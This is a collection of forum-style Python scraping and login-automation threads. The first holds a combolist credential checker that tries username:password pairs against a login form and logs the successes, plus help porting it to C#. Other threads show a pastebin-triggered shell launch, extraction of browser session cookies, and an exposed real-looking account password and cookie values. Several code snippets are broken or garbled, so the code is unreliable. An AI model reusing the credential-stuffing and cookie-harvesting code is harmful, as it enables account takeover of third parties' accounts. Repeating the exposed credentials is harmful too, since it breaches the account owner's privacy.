I want help translating finding the equivalent code for the C# version.
Mainly, I don't understand the BeautifulSoup and html.parser the most.
Which libraries would I use in C# I ask for demonstration of code example. Thanks for all the help.
import urllib.parse
import time
from bs4 import BeautifulSoup
def check_acc(user,password):
POST = 'POST'
GET = 'GET'
data = "userLoginId={}&password={}&STAYIN=false&flow=websiteSignUp&mode=login&action=loginAction&withFields=STAYIN%2CnextPage%2CuserLoginId%2Cpassword%2CcountryCode%2CcountryIsoCode&authURL=authURL%2FEcpWPKhtag%3D&nextPage=&showPassword=&countryCode=%2B33&countryIsoCode=USA".format(email, password).encode("utf-8")
request_login = urllib.request.Request("https://www.mywebsitetest:8080/Admin",
data = data,
headers ={
'Host': 'www.mywebsitetest.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'fr-FR',
'Accept-Encoding': 'gzip, deflate, br',
'Referer': 'https://www.mywebsitetest/USA/Login',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': 330},
unverifiable = True,
method = 'POST')
resfused_msg = "Wrong combination</a>.".format('<a href="/">')
try:
response = urllib.request.urlopen(request_login)
readed = response.read()
soup = BeautifulSoup(readed, "html.parser")
IsTrue = str(soup.findAll("div", attrs={"class" : "ui-message-contents"}).text)
if IsTrue == resfused_msg:
print("Refused => ({}:{})".format(user, password))
else:
print("Accepted => ({}:{})".format(user, password))
result_file = open(result, "a")
result_file.write(user + ":" + password)
except Exception as e:
print(f"[-] Sorry an error as occured.\n=> {e}\n")
print("[+]Closing program.\n")
time.sleep(2)
exit()
combo = "working.txt"
try:
combo_file = open(combo, "r")
line = list(combo)
print("[+]Combolist loaded.\n")
for line in combo_file:
user = line.split(":")[0]
password = line.split(":")[1]
check_acc(user,password)
except FileNotFoundError:
print("[-]NOthing found.")
print("[+]Bye!...\n")
time.sleep(20)
exit()```
The Html Agility Pack is one of the most common HTML parsing packages used in C#. It is available via direct download or from the NuGet package feed. The documentation is available here. You should also get the CssSelectors nuget package to allow you to use CSS Selectors to extract elements from the DOM.
To get your div with the ui-message-contents class you will do something like:
// You will need to pass in/configure the headers and other fields for your request before you call GetResponse
HttpWebRequest request= (HttpWebRequest)WebRequest.Create(url);
HttpWebResponse response = (HttpWebResponse)request.GetResponse();
HtmlDocument document = new HtmlAgilityPack.HtmlDocument();
document.Load(response.GetResponseStream());
IList<HtmlNode> elements = document.QuerySelectorAll("div.ui-message-contents");
// or if you're only expecting a single result
HtmlNode element = document.QuerySelector("div.ui-message-contents");
Related
from bs4 import BeautifulSoup
import requests
searchresults = []
search = 'seo'
url = 'https://www.google.com/search'
headers = {
'Accept' : '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82',
}
parameters = {'q': search}
content = requests.get(url, headers = headers, params = parameters).text
soup = BeautifulSoup(content, 'html.parser')
search = soup.find(id = 'search')
first_link = search.find('a')
searchresults.append(first_link['href'])
for i,j in enumerate(searchresults):
print(searchresults[i])
How do i return the whole search result URL list? I would like to later on add multiple pages soo i can index all the URLs
If you want to get all the links from the search result, replace your code after search = soup.find(id = 'search'):
a_tags = search.find_all('a', href=True)
searchresults = [i['href'] for i in a_tags]
for i,j in enumerate(searchresults):
print(j)
Your code currently gives one 1 link because you are using search.find('a') which gives the first result, instead of search.find_all('a', href=True), which gives all the a tags that have a link.
I am scraping data from the Rakuten Japanese e-commerce website. I am using requests-html and Beautiful soup.
And the problem is when I request from my local pc (127.0.0.1) it's working fine. But when I request from my ec2 server getting Reference #<esi:vars name="AKAMAI_DEBUG_STRING"/> this message and no data or HTML page is found. And another case when I use wget and request from the server the page URL I get a full page. But my script doesn't work.
Here is my code sample:
from bs4 import BeautifulSoup
from requests_html import HTMLSession
def get_search_url(query_keyword):
base_url = 'https://search.rakuten.co.jp/search/mall/'
headers = {
'upgrade-insecure-requests': '1',
'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8',
}
session = HTMLSession()
session.headers.update(headers)
request_url = base_url + query_keyword
resp = session.get(request_url)
soup = BeautifulSoup(resp.text, "lxml")
return soup
def feature_product_details(url):
output_list = []
for i in url.find_all("div", attrs={"class": "dui-card searchresultitem"}):
product_title = i.find("div", attrs={"class": "content title"})
if product_title is not None:
product_title = product_title.getText()
else:
product_title = ""
output = {
'title': product_title,
}
output_list.append(output)
print(output_list)
return output_list
def main_rakuten_product_search(query):
query_keyword = query
page = get_search_url(query_keyword)
product_lists = feature_product_details(page)
return product_lists
if __name__ == '__main__':
queries = '【レビュー特典中】スマートキー 電波遮断ケース 電波遮断ボックス リレーアタック防止用 キーケース '
main_rakuten_product_search(queries)
Sample output when running local server:
[
{
"title": "【レビュー特典中】スマートキー 電波遮断ケース 電波遮断ボックス リレーアタック防止用 キーケース リレーアタック対策 ボックス 箱 電波遮断ケース RFIDブロッキング 高級PUレザー 高級車盗難防止 カーセキュリティ 高級感溢れ レクサス(グレー)",
}
]
But don't get any response when running it on my server: Just show
this message Reference #<esi:vars name="AKAMAI_DEBUG_STRING"/>
If anyone has any idea on how this could be done, I would be grateful to hear.
I've tried your code on an EC2 in ap-northeast-1 (Tokyo) and I'm getting the sample output.
So, here are few things to check:
make sure your EC2 has the right ports open
double check the headers (I've modified yours a bit - see code below)
check your query input; maybe some of them are malformed?
don't spray the rakuten server with too many requests from one EC2; maybe they're blocking you already
Here's your code after some slight tuning:
from bs4 import BeautifulSoup
from requests_html import HTMLSession
def get_search_url(query_keyword):
base_url = 'https://search.rakuten.co.jp/search/mall/'
headers = {
'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36',
'referer': 'https://www.rakuten.co.jp/'
}
session = HTMLSession()
session.headers.update(headers)
return BeautifulSoup(session.get(base_url + query_keyword).content, "lxml")
def feature_product_details(url):
output_list = []
for i in url.find_all("div", attrs={"class": "dui-card searchresultitem"}):
product_title = i.find("div", attrs={"class": "content title"})
if product_title is not None:
product_title = product_title.getText()
else:
product_title = ""
output_list.append({'title': product_title})
return output_list
def main_rakuten_product_search(query):
return feature_product_details(get_search_url(query))
if __name__ == '__main__':
queries = '【レビュー特典中】スマートキー 電波遮断ケース 電波遮断ボックス リレーアタック防止用 キーケース '
print(main_rakuten_product_search(queries))
I am trying to auto-login to pastebin account using python, but im failing and i don't know why. I copied the request headers exactly and double checked... but still i am greeted with 400 HTTP code. Can somebody help me?
This is my code:
import requests
from bs4 import BeautifulSoup
import subprocess
import os
import sys
from requests import Session
# the actual program
page = requests.get("https://pastebin.com/99qQTecB")
parse = BeautifulSoup(page.content, 'html.parser')
string = parse.find("textarea")
command = 'hello'
###########################################################
URL = 'https://pastebin.com'
LOGIN_ROUTE ='/login'
d = requests.session()
cfduid = d.get(URL).cookies['__cfduid']
e = requests.session()
csrf = e.get(URL).cookies['_csrf-frontend']
f = requests.session()
pastebin = f.get(URL).cookies['pastebin-frontend']
print (csrf)
print(cfduid)
print(pastebin)
HEADERS = {'Host':'pastebin.com', 'User-Agent':'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language':'en-US,en;q=0.5',
'Accept-Encoding':'gzip, deflate, br' , 'Referer': 'https://pastebin.com/login', 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': '174', 'Connection': 'keep-alive', 'Cookie': "__cfduid=" + cfduid + ";", '_csrf-frontend':csrf + ";"
,'pastebin-frontend':pastebin + ";" ,'Upgrade-Insecure-Requests': '1'}
if command in string:
/super_mario_bros.exe', shell=True)
s = requests.session()
csrf_token = s.get(URL).cookies['_csrf-frontend']
login_payload = {
'LoginForm[username]': 'SECRET',
'LoginForm[password]': 'Secret',
'_csrf-frontend': csrf_token
}
#Actual Login
login_req = s.post(URL + LOGIN_ROUTE, data=login_payload)
print(csrf_token)
print(login_req.status_code)
else:
print("smth")
#print(string)
#Cookie: __cfduid=d955068eb3316226875aa037c059fd8f11595841495; __gads=ID=49ab9fcccba85989:T=1595841504:S=ALNI_MYT-PJZzkGrbYunHFHQE-EEw3vfhQ; _ga=GA1.2.1839432134.1595810341; pastebin-frontend=a9bf2e8c462237148c2d5f6b0832387c; _csrf-frontend=8213fdd4c42f9cfad45ed4993a25a1753c3539b1700c9e92be8ffac00780e34ea%3A2%3A%7Bi%3A0%3Bs%3A14%3A%22_csrf-frontend%22%3Bi%3A1%3Bs%3A32%3A%22HHm8aNkQL8XAG8joV8KfCZqOTls50yyW%22%3B%7D; _gid=GA1.2.1476917794.1596212111
I am really exhausted cause for the last couple of hours ive been trying to make this work, but still 400 Code is there. Thank you in advance!
I can recommend browser_cookie3:
import browser_cookie3
import requests
from bs4 import BeautifulSoup
cj = browser_cookie3.load()
s = requests.Session()
for c in cj:
if 'pastebin' in str(c):
s.cookies.set_cookie(c)
r = s.get('https://pastebin.com/')
soup = BeautifulSoup(r.content, 'lxml')
print(soup.select_one('div.header__user-name').text)
prints:
UWTD
This code take the session cookies from the browser and use them. And prints the username of the user.
I'm writing an application which needs to communicate with a ASP.NET website that doesn't have an API.
I'm using Python 3.5.2 with Requests 2.18.4 to achieve my purpose.
The problem is the site is using _dopostback() so I achieved my goal using Selenium but it was slow and it opened a browser for every request that I wanted to make.
First I analyzed the POST data sent to the website for login using BurpSuite. The contained some hidden fields from the webpage HTML and the username, password, captcha and a radio button.
A successful login attempt will return 302 HTTP response code and redirect the browser to the profile page.
I extract the hidden fields and get the captcha image and enter it manually myself and POST the data to the website but it returns 200 response telling an error occurred.
This is the Code:
import re
import requests
from urllib.request import urlretrieve
from collections import OrderedDict
from bs4 import BeautifulSoup as BS
from PIL import Image
def get_and_show_captcha(session):
soup = BS(current_response.text, "html.parser")
image_url = soup.find("img", {"id": 'RadCaptcha1_CaptchaImageUP'})["src"]
Image.open(urlretrieve(base_url + image_url)[0]).show()
base_url = 'http://example.com/'
section_login = 'login.aspx'
proxies = {
'http': 'http://127.0.0.1:8080',
}
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0',
'DNT': '1',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Upgrade-Insecure-Requests': '1',
}
session = requests.Session()
session.headers.update(headers)
r = session.get('http://example.com/login.aspx', proxies=proxies)
login_post_dict = OrderedDict()
login_post_dict['__EVENTTARGET'] = ''
login_post_dict['__EVENTARGUMENT'] = ''
login_post_dict['__VIEWSTATE'] = ''
login_post_dict['__VIEWSTATEGENERATOR'] = ''
login_post_dict['__PREVIOUSPAGE'] = ''
login_post_dict['__EVENTVALIDATION'] = ''
login_post_dict['txtUserName'] = 'USERNAME'
login_post_dict['txtPassword'] = 'PASSWORD'
get_and_show_captcha(session=session)
capthca = input('CAPTCHA: ')
login_post_dict['rcTextBox1'] = capthca
login_post_dict['RadCaptcha1_ClientState'] = ''
login_post_dict['SOMERADIO'] = 'RADIOBUTTON'
login_post_dict['btn_enter'] = 'ENTER'
login_post_dict['txtUserName2'] = ''
login_post_dict['txt_email'] = ''
soup = BS(r.text, 'html.parser')
capture_id = re.compile("id=\"(\w*)\"")
capture_value = re.compile("value=\"(.*)\"")
for html_input in soup.find_all('input', attrs={'type': 'hidden'}):
for hidden_id in capture_id.findall(str(html_input)):
if hidden_id != r"RadCaptcha1_ClientState":
login_post_dict[hidden_id] = ''
for hidden_id_value in capture_value.findall(str(html_input)):
if hidden_id_value is '':
continue
login_post_dict[hidden_id] = hidden_id_value
session.headers.update({'Referer': base_url + section_login})
print(login_post_dict)
session.post(base_url + section_login, data=login_post_dict, proxies=proxies)
I send the script data through BurpSuit in order to see whats being sent exactly.
Any solution?
l feel puzzled.
My idea is that I want to send request to the url, and then extract the POST data in the web page, and then sent to the web page.When l used the urllib.request in python,l failed,but instead that l used the requests,it works!
Please tell me why....
Here is the code,and the annotation is code which l used urllib.request
import urllib.request
import http.cookiejar
import re
import requests
loginUrl='https://passport.csdn.net/account/login?from=http://my.csdn.net/my/mycsdn'
#Here is the urllib.request code
#cookies=http.cookiejar.MozillaCookieJar()
#handler=urllib.request.HTTPCookieProcessor(cookies)
#opener=urllib.request.build_opener(handler)
headers={
'Origin': 'http://passport.csdn.net',
'Referer':'http://passport.csdn.net/account/login?from=http%3A%2F%2Fmy.csdn.net%2Fmy%2Fmycsdn',
'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36 LBBROWSER'
}
#Here is the requests code
s = requests.Session()
data = s.get(loginUrl)
data = data.text
#request = urllib.request.Request(loginUrl)
#response = urllib.request.urlopen(request)
#data = response.read().decode('utf-8')
#l get the value of lt and execution from the web page
pattern_lt = re.compile('<input type="hidden" name="lt" value="(.*?)" />',re.S)
lt = re.findall(pattern_lt,data)
lt = lt[0]
pattern_exe = re.compile('<input type="hidden" name="execution" value="(.*?)" />',re.S)
exe = re.findall(pattern_exe,data)
exe = exe[0]
postDict = {
'username':'qinyufeng_hdq#163.com',
'password':'csdn690076598',
'lt':lt,
'execution':exe,
'_eventId':'submit'
}
r = s.post(loginUrl, data=postDict)
#postData = urllib.parse.urlencode(postDict).encode()
#request = urllib.request.Request(loginUrl, postData,headers)
#response = opener.open(request)
#data = response.read().decode('UTF-8')
print (r.text)
l'm not good at English and l hope you get my idea and thank you for reading my problem.